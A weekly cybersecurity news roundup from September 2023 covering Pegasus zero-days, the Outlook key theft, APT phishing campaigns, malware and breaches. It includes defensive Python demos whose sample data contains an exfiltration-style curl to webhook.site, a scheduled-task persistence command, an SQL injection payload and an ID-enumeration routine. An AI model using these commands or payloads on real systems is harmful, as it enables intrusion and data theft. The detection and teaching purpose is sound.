Thursday, September 7th, 2023
Cybersecurity Week in Review (08/09/2023)
Apple Zero-click iMessage Exploit Used to Infect iPhones With Spyware
Citizen Lab says two zero-days fixed by Apple today in emergency security updates were actively abused as part of a zero-click exploit chain to deploy NSO Group’s Pegasus commercial spyware onto fully patched iPhones.
The two bugs, tracked as CVE-2023-41064 and CVE-2023-41061, allowed the attackers to infect a fully-patched iPhone running iOS 16.6 and belonging to a Washington DC-based civil society organization via PassKit attachments containing malicious images.
“We refer to the exploit chain as BLASTPASS. The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim,” Citizen Lab said.
“The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim.”
Citizen Lab also urged Apple customers to update their devices immediately and encouraged those at risk of targeted attacks due to their identity or profession to activate Lockdown Mode.
Apple and Citizen Lab security researchers discovered the two zero-days in the Image I/O and Wallet frameworks.
CVE-2023-41064 is a buffer overflow triggered when processing maliciously crafted images, while CVE-2023-41061 is a validation issue that can be exploited via malicious attachments.
Both allow threat actors to gain arbitrary code execution on unpatched iPhone and iPad devices.
Apple addressed the flaws in macOS Ventura 13.5.2, iOS 16.6.1, iPadOS 16.6.1, and watchOS 9.6.2 with improved logic and memory handling.
The list of affected devices includes:
• iPhone 8 and later
• iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
• Macs running macOS Ventura
• Apple Watch Series 4 and later
Since the start of the year, Apple has fixed a total of 13 zero-days exploited to target devices running iOS, macOS, iPadOS, and watchOS, including:
• two zero-days (CVE-2023-37450 and CVE-2023-38606) in July
• three zero-days (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439) in June
• three more zero-days (CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373) in May
• two zero-days (CVE-2023-28206 and CVE-2023-28205) in April
• and another WebKit zero-day (CVE-2023-23529) in February
Source – https://www.bleepingcomputer.com/news/security/apple-zero-click-imessage-exploit-used-to-infect-iphones-with-spyware/
Outlook Breach: Microsoft Reveals How a Crash Dump Led to a Major Security Breach
Microsoft on Wednesday revealed that a China-based threat actor known as Storm-0558 acquired the inactive consumer signing key it later used to forge tokens for accessing Outlook by compromising an engineer’s corporate account. That access let the adversary reach a debugging environment containing a crash dump, taken in April 2021, of the consumer signing system, and steal the key from it.
“A consumer signing system crash in April of 2021 resulted in a snapshot of the crashed process (‘crash dump’),” the Microsoft Security Response Center (MSRC) said in a post-mortem report.
“The crash dumps, which redact sensitive information, should not include the signing key. In this case, a race condition allowed the key to be present in the crash dump. The key material’s presence in the crash dump was not detected by our systems.”
The Windows maker said the crash dump was moved to a debugging environment on the internet-connected corporate network, from where Storm-0558 is suspected to have acquired the key after infiltrating the engineer’s corporate account. It is not currently known whether this is the exact mechanism the threat actor used, since Microsoft noted it does not have logs offering concrete proof of the exfiltration, owing to its log retention policies.
Microsoft’s report further alludes to spear-phishing and the deployment of token-stealing malware, but it did not elaborate on the modus operandi of how the engineer’s account was breached in the first place, if other corporate accounts were hacked, and when it became aware of the compromise.
That said, the latest development offers insight into a series of cascading security mishaps that culminated in the signing key ending up in the hands of a skilled actor with a “high degree of technical tradecraft and operational security.”
Storm-0558 is the moniker assigned by Microsoft to a hacking group that has been linked to the breach of approximately 25 organizations using the consumer signing key and obtaining unauthorized access to Outlook Web Access (OWA) and Outlook.com.
The zero-day issue was blamed on a validation error that allowed the key to be trusted for signing Azure AD tokens. Evidence shows that the malicious cyber activity commenced a month before it was detected in June 2023. This, in turn, was made possible because the “mail system would accept a request for enterprise email using a security token signed with the consumer key.” The “issue” has since been rectified by Microsoft.
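The scoping failure described above (a consumer key accepted as valid for enterprise tokens) is easy to reproduce in a small verifier. The following is an added illustration written for this review, not Microsoft’s code: it signs tokens with HMAC (HS256) so the file is self-contained, where the real keys were RSA, and the key IDs, issuer URLs and claims are assumptions. The flawed verifier checks only that the `kid` names some trusted key and that the signature matches; the scoped verifier additionally binds each key to the one issuer it may vouch for.

```python
# Added example, not Microsoft's code: a minimal JWT verifier contrasting
# "any trusted key is fine" with "a key is trusted only for its own issuer".
# HS256 (HMAC) is used so the file is self-contained; the real keys were RSA,
# but the scoping logic is the same. Keys, issuers and claims are constructed.
import base64
import hashlib
import hmac
import json

CONSUMER_KEY = {"kid": "consumer-2016", "secret": b"consumer-signing-secret",
                "issuer": "https://login.live.com"}
ENTERPRISE_KEY = {"kid": "enterprise-2023", "secret": b"enterprise-signing-secret",
                  "issuer": "https://login.microsoftonline.com/contoso"}
TRUSTED_KEYS = [CONSUMER_KEY, ENTERPRISE_KEY]


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_token(key: dict, claims: dict) -> str:
    """Issue a compact JWS (header.payload.signature) under the given key."""
    header = {"alg": "HS256", "typ": "JWT", "kid": key["kid"]}
    signing_input = _b64url(json.dumps(header).encode()) + "." + _b64url(json.dumps(claims).encode())
    sig = hmac.new(key["secret"], signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def _parse(token: str):
    h, p, s = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p)), _b64url_decode(s), h + "." + p


def _signature_ok(key: dict, signing_input: str, sig: bytes) -> bool:
    expected = hmac.new(key["secret"], signing_input.encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(sig, expected)


def verify_flawed(token: str, trusted_keys=TRUSTED_KEYS):
    """Accept the token if its kid names any trusted key and the signature checks out.
    The issuer claim is never compared against the key, so the consumer key can
    vouch for an enterprise tenant."""
    header, claims, sig, signing_input = _parse(token)
    for key in trusted_keys:
        if key["kid"] == header.get("kid") and _signature_ok(key, signing_input, sig):
            return claims
    return None


def verify_scoped(token: str, trusted_keys=TRUSTED_KEYS):
    """Same signature check, plus: pin the algorithm and trust the key only for
    the issuer it belongs to."""
    header, claims, sig, signing_input = _parse(token)
    if header.get("alg") != "HS256":
        return None
    for key in trusted_keys:
        if key["kid"] != header.get("kid"):
            continue
        if not _signature_ok(key, signing_input, sig):
            return None
        if claims.get("iss") != key["issuer"]:
            return None  # valid signature, wrong realm: reject
        return claims
    return None


# Token forged with the consumer key but claiming the enterprise issuer
FORGED = sign_token(CONSUMER_KEY, {"iss": ENTERPRISE_KEY["issuer"], "sub": "victim@contoso.com", "aud": "outlook"})
# Token legitimately issued by the enterprise identity provider
LEGIT = sign_token(ENTERPRISE_KEY, {"iss": ENTERPRISE_KEY["issuer"], "sub": "alice@contoso.com", "aud": "outlook"})

if __name__ == "__main__":
    print("flawed verifier accepts forged token:", verify_flawed(FORGED) is not None)
    print("scoped verifier accepts forged token:", verify_scoped(FORGED) is not None)
    print("scoped verifier accepts legit token:", verify_scoped(LEGIT) is not None)
```

In a real deployment the same binding applies to the key-discovery endpoint: a relying party should fetch keys from the issuer named in the token and refuse any `kid` that issuer does not publish, rather than holding one merged list of “keys we trust”.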
Phishing Campaigns Deliver New SideTwist Backdoor and Agent Tesla Variant
The Iranian threat actor tracked as APT34 has been linked to a new phishing attack that leads to the deployment of a variant of a backdoor called SideTwist. APT34 is technically capable, tailors its intrusion methods to different types of targets, and has demonstrated supply chain attack capability.
Also known by the names Cobalt Gypsy, Hazel Sandstorm (formerly Europium), Helix Kitten, and OilRig, APT34 has a track record of targeting telecommunications, government, defense, oil and financial services verticals in the Middle East since at least 2014 via spear-phishing lures that culminate in the deployment of various backdoors.
One of the key traits of the hacking outfit is its ability to create new and updated tools to minimize the odds of detection and gain a foothold on compromised hosts for extended periods of time. SideTwist was first documented as used by APT34 in April 2021, with an implant capable of file download/upload and command execution.
The attack chain starts with a bait Microsoft Word document that embeds a malicious macro, which, in turn, extracts and launches the Base64-encoded payload stored in the file. The payload is a variant of SideTwist that’s compiled using GCC and establishes communication with a remote server (11.0.188[.]38) to receive further commands.
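A document that carries its payload as a Base64 string in the file body, as described above, can be triaged without running the macro. The helper below is an added example, not code from the report, APT34 or any vendor tool: it carves long Base64 runs out of a file, decodes them, hashes the result and flags anything that starts with an executable magic number. The sample “document” and the PE header stub it embeds are constructed for the illustration.

```python
# Added example, not from the report or any vendor tool: a triage helper that
# carves long Base64 runs out of a document body and reports which ones decode
# to an executable. The sample "document" and its embedded payload are constructed.
import base64
import binascii
import hashlib
import re

# Runs of Base64 alphabet characters, with optional trailing padding
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

MAGIC = [
    (b"MZ", "PE executable/DLL"),
    (b"\x7fELF", "ELF executable"),
    (b"PK\x03\x04", "ZIP/OOXML container"),
    (b"#!", "script with shebang"),
]


def identify(blob: bytes):
    for magic, name in MAGIC:
        if blob.startswith(magic):
            return name
    return None


def carve_base64_payloads(data: bytes, min_len: int = 64):
    """Return one record per decodable Base64 run of at least min_len characters."""
    found = []
    for match in B64_RUN.finditer(data):
        run = match.group(0)
        if len(run) < min_len:
            continue
        core = run.rstrip(b"=")
        try:
            decoded = base64.b64decode(core + b"=" * (-len(core) % 4), validate=True)
        except binascii.Error:
            continue  # a run whose length is 1 mod 4 cannot be Base64
        found.append({
            "offset": match.start(),
            "encoded_len": len(run),
            "decoded_len": len(decoded),
            "kind": identify(decoded),
            "sha256": hashlib.sha256(decoded).hexdigest(),
        })
    return found


# Constructed stand-in for a dropped binary: a PE header stub, not a real program
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"\x00" * 100

# Constructed macro text in the shape described: a Base64 blob stored in the file
SAMPLE_DOC = (
    b"Sub AutoOpen()\r\n"
    b'    payload = "' + base64.b64encode(FAKE_PE) + b'"\r\n'
    b"    Call DropAndRun(payload)\r\n"
    b"End Sub\r\n"
)

if __name__ == "__main__":
    for rec in carve_base64_payloads(SAMPLE_DOC):
        print(rec)
```

For a real .docm the macro stream lives inside the OOXML ZIP (vbaProject.bin), so run the carver over the extracted stream rather than the container; the SHA-256 of each decoded blob is what you pivot on in threat-intel lookups.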
The development comes as a phishing campaign was identified that spreads a new Agent Tesla variant using a specially crafted Microsoft Excel document that exploits CVE-2017-11882, a six-year-old memory corruption vulnerability in Microsoft Office’s Equation Editor, and CVE-2018-0802.
According to available data, CVE-2017-11882 remains one of the most favored flaws to date, exploited by 467 malware strains, 53 threat actors, and 14 ransomware families as recently as August 31, 2023. It also follows the discovery of another phishing attack that has been found to employ ISO image file lures to launch malware strains such as Agent Tesla, LimeRAT, and Remcos RAT on infected hosts.
Ukraine’s CERT Thwarts APT28’s Cyberattack on Critical Energy Infrastructure
The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday said it thwarted a cyber attack against an unnamed critical energy infrastructure facility in the country. The intrusion, per the agency, started with a phishing email containing a link to a malicious ZIP archive that activates the infection chain.
“Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file ‘weblinks.cmd’ to the victim’s computer,” CERT-UA said, attributing it to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE).
“When a CMD file is run, several decoy web pages will be opened, .bat and .vbs files will be created, and a VBS file will be launched, which in turn will execute the BAT file.”
The next phase of the attack involves running the “whoami” command on the compromised host and exfiltrating the result, alongside downloading the Tor hidden service to route malicious traffic.
Persistence is achieved by means of a scheduled task and remote command execution is implemented using cURL through a legitimate service called webhook.site, which was recently disclosed as used by a threat actor known as Dark Pink.
CERT-UA said the attack was ultimately unsuccessful because access to Mocky and the Windows Script Host (wscript.exe) was restricted. It is worth noting that APT28 has been linked to the use of Mocky APIs in the past.
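Every step of the chain above leaves a process-creation event, which is what made the wscript.exe restriction effective. The detection logic below is an added example, not CERT-UA’s content: it runs four rules over constructed Sysmon-style JSON lines, one rule each for a script host spawning a shell, curl reaching a public webhook or mock service, a scheduled task created from that chain, and whoami run from it. The event field names and the relay domains (webhook.site, mocky.io) are assumptions for the example.

```python
# Added example, not CERT-UA's detection content: process-creation events in a
# Sysmon-like JSON-lines shape (constructed here) run through four rules that
# match the chain described above. Field names and the service domains
# (webhook.site and mocky.io) are assumptions for the sake of the example.
import json

PUBLIC_RELAY_DOMAINS = ("webhook.site", "mocky.io")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SHELLS = ("cmd.exe", "powershell.exe")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def script_host_spawns_shell(e):
    return basename(e["parent"]) in SCRIPT_HOSTS and basename(e["image"]) in SHELLS


def curl_to_public_relay(e):
    cmd = e["cmdline"].lower()
    return basename(e["image"]) == "curl.exe" and any(d in cmd for d in PUBLIC_RELAY_DOMAINS)


def scheduled_task_from_script_chain(e):
    return (basename(e["image"]) == "schtasks.exe"
            and "/create" in e["cmdline"].lower()
            and basename(e["parent"]) in SCRIPT_HOSTS + SHELLS)


def discovery_from_script_chain(e):
    return basename(e["image"]) == "whoami.exe" and basename(e["parent"]) in SCRIPT_HOSTS + SHELLS


RULES = [
    ("script host spawned a command shell", script_host_spawns_shell),
    ("curl to a public webhook/mock service", curl_to_public_relay),
    ("scheduled task created from a script chain", scheduled_task_from_script_chain),
    ("host discovery (whoami) from a script chain", discovery_from_script_chain),
]


def detect(jsonl: str):
    """Return (timestamp, rule name, process) for every event that trips a rule."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        for name, rule in RULES:
            if rule(event):
                alerts.append((event["ts"], name, basename(event["image"])))
    return alerts


# Constructed sample telemetry: one benign launch, the four-step chain, one benign curl
SAMPLE_EVENTS = r"""
{"ts":"2023-09-05T10:01:02Z","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\wscript.exe","cmdline":"wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\run.vbs"}
{"ts":"2023-09-05T10:01:03Z","parent":"C:\\Windows\\System32\\wscript.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c C:\\Users\\u\\AppData\\Local\\Temp\\stage.bat"}
{"ts":"2023-09-05T10:01:04Z","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\whoami.exe","cmdline":"whoami"}
{"ts":"2023-09-05T10:01:05Z","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\curl.exe","cmdline":"curl.exe -s https://webhook.site/example-id -d @out.txt"}
{"ts":"2023-09-05T10:01:06Z","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\schtasks.exe","cmdline":"schtasks.exe /create /tn Updater /tr C:\\Users\\u\\AppData\\Local\\Temp\\stage.bat /sc minute /mo 5"}
{"ts":"2023-09-05T10:07:00Z","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\curl.exe","cmdline":"curl.exe https://example.com/index.html"}
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(*alert)
```

The relay-domain rule is the noisiest of the four on its own; correlating it with a script-host parent within the same minute, as the sample chain shows, is what turns it into a high-confidence alert.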
The disclosure comes amid continued phishing attacks targeting Ukraine, some of which have been observed leveraging an off-the-shelf malware obfuscation engine named ScrubCrypt to distribute AsyncRAT.
Another cyber assault mounted by GhostWriter (aka UAC-0057 or UNC1151) is said to have weaponized a recently disclosed zero-day flaw in WinRAR (CVE-2023-38831, CVSS score: 7.8) to deploy PicassoLoader and Cobalt Strike, the agency said.
7 Million Users Possibly Impacted by Freecycle Data Breach
Freecycle.org, a platform that allows users to recycle their belongings, has prompted millions of users to reset their passwords after their credentials were compromised in a data breach. The non-profit organization, which is based in the US but operates in the UK as well, says it identified the incident on August 30, and it has started sending notifications to its users.
“The breach of data includes usernames, User IDs, email addresses and passwords,” Freecycle says in an incident notice on its website. The passwords were hashed, the platform said in the email notification sent to users, a copy of which was posted on social media.
According to the organization, no other personal information aside from the exposed credentials was compromised during the incident.
“We are advising all members to change their passwords as soon as possible. We apologize for the inconvenience and would ask that you watch this space for further pending background,” a message from Freecycle Network’s executive director Deron Beal reads.
The organization provides detailed instructions on how users can reset their passwords and advises them to make sure that any reused passwords are reset on all other online platforms as well.
Following the data breach, Freecycle says, users might start receiving more spam in their mailboxes. The leaked data may also be used in phishing attacks. What the organization has not revealed, however, is how the attackers gained access to its systems or how many of its approximately 11 million users might be impacted.
According to screenshots that the alleged Freecycle hacker posted two months ago, more than 7 million individuals might have been affected by the incident. The hacker reportedly used stolen credentials to access the data. Freecycle says it has informed the relevant authorities in the UK and the US about the data breach.
New Python Variant of Chaes Malware Targets Banking and Logistics Industries
Banking and logistics organizations are being targeted by a reworked variant of a malware called Chaes. Chaes, which first emerged in 2020, is known to target e-commerce customers in Latin America, particularly Brazil, to steal sensitive financial information.
It has undergone major overhauls: from being rewritten entirely in Python, resulting in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol.
Analysis in early 2022 found that the threat actors behind the operation, who call themselves Lucifer, had breached more than 800 WordPress websites to deliver Chaes to users of Banco do Brasil, Loja Integrada, Mercado Bitcoin, Mercado Livre, and Mercado Pago.
Further updates were detected in December 2022, when the malware’s use of Windows Management Instrumentation (WMI) was detected in its infection chain to facilitate the collection of system metadata, such as BIOS, processor, disk size, and memory information.
The latest iteration of the malware, dubbed Chae$ 4 in reference to debug log messages present in the source code, packs in “significant transformations and enhancements,” including an expanded catalog of services targeted for credential theft as well as clipper functionalities.
Despite the changes in the malware architecture, the overall delivery mechanism has remained the same in attacks that were identified in January 2023.
Potential victims landing on one of the compromised websites are greeted by a pop-up message asking them to download an installer for Java Runtime or an antivirus solution, triggering the deployment of a malicious MSI file that, in turn, launches a primary orchestrator module known as ChaesCore.
The component is responsible for establishing a communication channel with the command-and-control (C2) server from where it fetches additional modules that support post-compromise activity and data theft. Persistence on the host is accomplished by means of a scheduled task, while C2 communications entail the use of WebSockets, with the implant running in an infinite loop to await further instructions from the remote server.
The targeting of cryptocurrency transfers and instant payments via Brazil’s PIX platform is a noteworthy addition that underscores the threat actors’ financial motivations. The Chronod module introduces another component of the framework, called Module Packer, which gives the module its own persistence and migration mechanisms, working much like ChaesCore’s.
The persistence method involves altering all shortcut files (LNK) associated with web browsers (e.g., Google Chrome, Microsoft Edge, Brave, and Avast Secure Browser) to execute the Chronod module instead of the actual browser.
UK Election Body Failed Cybersecurity Test Before Hack
The United Kingdom Electoral Commission failed a basic cybersecurity test at around the same time it was hacked, a whistleblower revealed to the BBC. The commission previously disclosed a data breach that exposed the personal details of anybody who was registered to vote in the country between 2014 and 2022, around 40 million voters.
Now, a whistleblower has told the BBC that the commission was given an automatic fail during a Cyber Essentials audit. The commission confirmed the claim and said that it had still not passed the test. According to the BBC, in the same month that hackers were breaking into the organization, the commission was told by cybersecurity auditors that it was not compliant with the Cyber Essentials scheme.
A spokeswoman for the Electoral Commission admitted the failings to the BBC but claims they weren’t linked to the cyber-attack that impacted email servers.
The attackers had access to the electoral systems for a number of months, indicating they were in search of something other than quick financial gain, which is the most common motive of attacks. The longer an attacker stays undetected in a network – the more damage they can do.
When the hack was announced, the Electoral Commission said that the data hacked from the full electoral register was “largely in the public domain.”
“We don’t know how this data might be used, but according to the risk assessment used by the Information Commissioner’s Office, the personal data held on electoral registers, typically name and address, does not in itself present a high risk to individuals,” the commission said in August.
But the attackers – it’s not yet clear who was responsible for the intrusion – could now potentially spread disinformation to the 40 million UK citizens in the database and amplify disharmony. They can also manipulate the information within these systems in order to create distrust by calling to question the authenticity and accuracy of voter data or even, in the worst case, votes themselves.
The breach and the failure to pass the audit is a reminder that cyber defenses at all public and private organizations need to be reinforced.
Ransomware Attack on Fencing Systems Maker Zaun Impacts UK Military Data
British mesh fencing systems maker Zaun has disclosed a LockBit ransomware attack that potentially led to the compromise of data related to UK military and intelligence sites. Headquartered in Wolverhampton, Zaun specializes in high-security perimeter fencing products used by prisons, military bases, and utilities.
In a data breach notice posted on September 1, Zaun announced that the cyberattack occurred in early August, that it was able to thwart it before data was encrypted, and that its services were not interrupted by the incident. According to the company, although file-encrypting ransomware was not executed on its systems, the LockBit ransomware group did manage to exfiltrate data from the network.
“At the time of the attack, we believed that our cyber-security software had thwarted any transfer of data. However, we can now confirm that during the attack LockBit managed to download some data,” the company says.
Zaun notes that all its fencing products are typically used to “separate the public from the secure asset”, meaning that they are on public display and that the attackers would gain no advantage from the compromised data.
“LockBit will have potentially gained access to some historic emails, orders, drawings and project files, we do not believe that any classified documents were stored on the system or have been compromised. We are in contact with relevant agencies and will keep these updated as more information becomes available,” the company says.
However, Zaun also acknowledges that the ransomware group has since made the stolen data public on the internet. Some of the information appears related to UK military, intelligence, and research bases.
As part of the cyberattack, the LockBit gang first compromised a Windows 7 computer running software for a manufacturing machine, and likely only exfiltrated data from that system, Zaun says.
Active since at least 2020 and operating under the Ransomware-as-a-Service (RaaS) model, LockBit was responsible for roughly one-fifth of the ransomware attacks observed in Australia, Canada, New Zealand, and the US last year, and is believed to have received more than $91 million in ransom payments.
New BLISTER Malware Update Fuelling Stealthy Network Infiltration
An updated version of a malware loader known as BLISTER is being used as part of SocGholish infection chains to distribute an open-source command-and-control (C2) framework called Mythic.
The new BLISTER update includes a keying feature that allows precise targeting of victim networks and lowers the loader’s exposure in VM/sandbox environments. BLISTER was first uncovered in December 2021 acting as a conduit to distribute Cobalt Strike and BitRAT payloads on compromised systems.
In these attacks, BLISTER is embedded within a legitimate VLC Media Player library in an attempt to get around security software and infiltrate victim environments.
Both SocGholish and BLISTER have been used in tandem as part of several campaigns, with the latter used as a second-stage loader to distribute Cobalt Strike and LockBit ransomware, as documented in early 2022.
A closer analysis of the malware shows that it’s being actively maintained, with its authors incorporating a slew of techniques to evade detection and complicate analysis. BLISTER continues to be used to load a variety of malware, including clipbankers, information stealers, trojans, ransomware, and shellcode.
Insurer Fined $3M for Exposing Data of 650k Clients for Two Years
The Swedish Authority for Privacy Protection (IMY) has fined insurer Trygg-Hansa $3 million for exposing on its online portal sensitive data belonging to hundreds of thousands of customers. Trygg-Hansa is an insurer for individuals, private companies, and public organizations, and also an asset management and investment consultation firm.
IMY initiated an investigation into the firm after receiving a tip from a Moderna Försäkringar (now part of Trygg-Hansa) customer, who had discovered it was possible to access the insurer’s backend by following links available on quotation pages sent to clients.
These are sent to all existing or potential customers via SMS or email, containing a unique web address (URL) to a quote page on Trygg-Hansa’s website.
IMY confirmed that the backend database was accessible without requiring authentication, and that anyone could browse other individuals’ private documents by changing the client ID number in the URL, which was sequential.
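The pattern IMY describes is a textbook insecure direct object reference: the link’s only “secret” is a sequential client ID, and the backend never checks who is asking. The code below is an added example, not Trygg-Hansa’s, showing that access path beside a hardened one in which the link carries an unguessable, expiring token and the caller must also own the document. The document store, client IDs and customer names are constructed.

```python
# Added example, not Trygg-Hansa's code: the access pattern behind the finding
# (a per-client link whose only secret is a sequential client ID, with no
# authentication or ownership check) next to a hardened version. The document
# store, client IDs and names are constructed.
import secrets
import time


class Forbidden(Exception):
    pass


# Sequential client IDs, as in the flaw: 1001, 1002, ...
DOCUMENTS = {
    1001: {"owner": "anna", "body": "quote and health declaration for anna"},
    1002: {"owner": "bo", "body": "quote and health declaration for bo"},
}


def fetch_document_vulnerable(client_id: int) -> str:
    """The link parameter is the only input: no session, no ownership check, and
    because IDs are sequential the next customer is always client_id + 1."""
    return DOCUMENTS[client_id]["body"]


def enumerate_documents(fetch, start: int, count: int) -> dict:
    """What an attacker (or an auditor proving the issue) runs against the vulnerable path."""
    leaked = {}
    for client_id in range(start, start + count):
        try:
            leaked[client_id] = fetch(client_id)
        except KeyError:
            continue
    return leaked


# Hardened: the link carries an unguessable, expiring token that maps to one
# document, and the caller must also be the document's owner.
LINK_TOKENS = {}  # token -> (client_id, expires_at)


def issue_link_token(client_id: int, ttl_seconds: int = 7 * 24 * 3600) -> str:
    token = secrets.token_urlsafe(32)  # 256 bits of randomness; not enumerable
    LINK_TOKENS[token] = (client_id, time.time() + ttl_seconds)
    return token


def fetch_document_hardened(session_user: str, token: str) -> str:
    entry = LINK_TOKENS.get(token)
    if entry is None:
        raise Forbidden("unknown token")
    client_id, expires_at = entry
    if time.time() > expires_at:
        raise Forbidden("expired link")
    document = DOCUMENTS[client_id]
    if document["owner"] != session_user:
        raise Forbidden("caller does not own this document")
    return document["body"]


def access_denied(session_user: str, token: str) -> bool:
    """True when the hardened path refuses the request."""
    try:
        fetch_document_hardened(session_user, token)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print("enumeration leaks:", enumerate_documents(fetch_document_vulnerable, 1000, 5))
    tok = issue_link_token(1001)
    print("owner with valid token:", fetch_document_hardened("anna", tok))
    print("other user, same token, denied:", access_denied("bo", tok))
    print("guessed token denied:", access_denied("anna", "1001"))
```

For quote links sent by SMS or email to prospects who have no account yet, the ownership check is not always available; in that case the token’s entropy and expiry are the whole control, and the backend must still never accept a bare client ID.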
About 650,000 customers have been impacted. The information exposed included:
- Personal data
- Health information
- Condition details
- Financial information
- Contact details
- Social security number
- Insurance details
To make matters worse, IMY determined that the data was exposed through Trygg-Hansa’s portal to unauthorized parties for more than two years, between October 2018 and February 2021. Such an extensive exposure period increases the likelihood of someone finding the flaw and exploiting it to collect sensitive information.
This type of data can then be sold to cybercriminals and used for scamming, phishing, or even extorting the exposed individuals. IMY has been able to confirm at least 202 cases of customers who had their personal information exposed to unauthorized users, but this may be the tip of the iceberg.
“The deficiencies have been of such fundamental nature that Trygg-Hansa should have been able to detect and remedy these before the current IT system was introduced and in any case, during the long period the system was used.” – IMY
The insurer’s failure to remedy the issues all this time, even after it received reports about the flaw, according to IMY, indicates a severe shortfall in data security and risk mitigation measures for which the regulator decided to impose an administrative penalty of $3M.
German Financial Agency Site Disrupted by DDoS Attack Since Friday
The German Federal Financial Supervisory Authority (BaFin) announced today that an ongoing distributed denial-of-service (DDoS) attack has been impacting its website since Friday. BaFin is Germany’s financial regulatory authority, part of the Federal Ministry of Finance, responsible for supervising 2,700 banks, 800 financial service providers, and 700 insurers.
The regulator is known for its enforcement role in Germany and internationally. In recent years, it imposed $10M and $5M fines on Deutsche Bank and Bank of America, respectively, for various violations.
The German agency said today that it has taken all the appropriate security precautions and defensive measures to shield its operations from the attackers. Part of the response was to take BaFin’s public website at “bafin.de” offline; however, the organization assures that all other systems, which are crucial for its mission, work without restrictions.
Although some users might be able to access BaFin’s website intermittently, it is mostly unavailable.
BaFin’s public website hosts consumer and regulation information, measures, warnings, and also serves as a space to publish important documents relating to the agency’s investigation activities and findings. Also, the site hosts a database of registered companies and public tenders, a job vacancies space, and a platform for whistleblowers to report violations anonymously. All that has remained inaccessible since Friday.
BaFin says its IT team works intensively to fully restore public access to the website but it cannot estimate when its pages.
It is unclear who is behind the DDoS on the German financial authority, but it is possible that pro-Russian hacktivists are responsible, in response to the country’s supportive stance towards Ukraine, which includes financial aid and military equipment.
Chinese-Speaking Cybercriminals Launch Large-Scale iMessage Smishing Campaign in U.S.
A new large-scale smishing campaign is targeting the U.S. by sending iMessages from compromised Apple iCloud accounts with an aim to conduct identity theft and financial fraud.
The Chinese-speaking threat actors behind this campaign are operating a package-tracking text scam sent via iMessage to collect personally identifying information (PII) and payment credentials from victims, in the furtherance of identity theft and credit card fraud.
The cybercrime group, dubbed Smishing Triad, is also said to be in the business of “fraud-as-a-service,” offering other actors ready-to-use smishing kits via Telegram that cost $200 a month. These kits impersonate popular postal and delivery services in the U.S., the U.K., Poland, Sweden, Italy, Indonesia, Malaysia, Japan, and other countries.
A stand-out aspect of the activity is the use of breached Apple iCloud accounts as a delivery vector to send package delivery failure messages, urging recipients to click on a link to reschedule the delivery and enter their credit card information in a fake form.
Analysis of the smishing kit revealed an SQL injection vulnerability that allowed the researchers who examined it to retrieve over 108,044 records of victims’ data.
Considering the identified vulnerability or potential backdoor, it is possible that key members of ‘Smishing Triad’ organized a covert channel to collect results with intercepted personal and payment data from other members and clients leveraging their kit. Such tradecraft is widely used by cybercriminals in password stealers and phishing kits, allowing them to profit from the activities of their clients, or at least to seamlessly monitor their activity just by logging into an administration panel.
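The injection flaw described above is the reason one kit can expose every customer’s captures at once: the operator panel filters captured records per client, but builds that filter by splicing input into the query. The code below is an added example, not the Smishing Triad kit’s code, showing the bug class beside the parameterized form against a constructed in-memory table; the column names and rows are invented for the illustration.

```python
# Added example, not the Smishing Triad kit's code: the bug class described
# above (an operator-panel lookup that splices user input into SQL) beside the
# parameterized form, run against a constructed in-memory table of "captured"
# records. Column names and rows are invented for the illustration.
import sqlite3


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE victims (id INTEGER PRIMARY KEY, operator TEXT, email TEXT, card_last4 TEXT)")
    conn.executemany(
        "INSERT INTO victims (operator, email, card_last4) VALUES (?, ?, ?)",
        [("client-a", "v1@example.com", "1111"),
         ("client-a", "v2@example.com", "2222"),
         ("client-b", "v3@example.com", "3333")],
    )
    return conn


def lookup_vulnerable(conn, operator: str):
    """Each kit customer is meant to see only their own captures, but the filter
    is built by string formatting, so the WHERE clause can be rewritten."""
    sql = f"SELECT id, operator, email, card_last4 FROM victims WHERE operator = '{operator}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, operator: str):
    """Same query with a bound parameter: the input can only ever be a value."""
    return conn.execute(
        "SELECT id, operator, email, card_last4 FROM victims WHERE operator = ?", (operator,)
    ).fetchall()


# Classic tautology payload: turns the filter into operator = 'x' OR '1'='1'
DUMP_ALL = "x' OR '1'='1"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, payload:", lookup_vulnerable(db, DUMP_ALL))
    print("safe, payload:    ", lookup_safe(db, DUMP_ALL))
    print("safe, legit:      ", lookup_safe(db, "client-a"))
```

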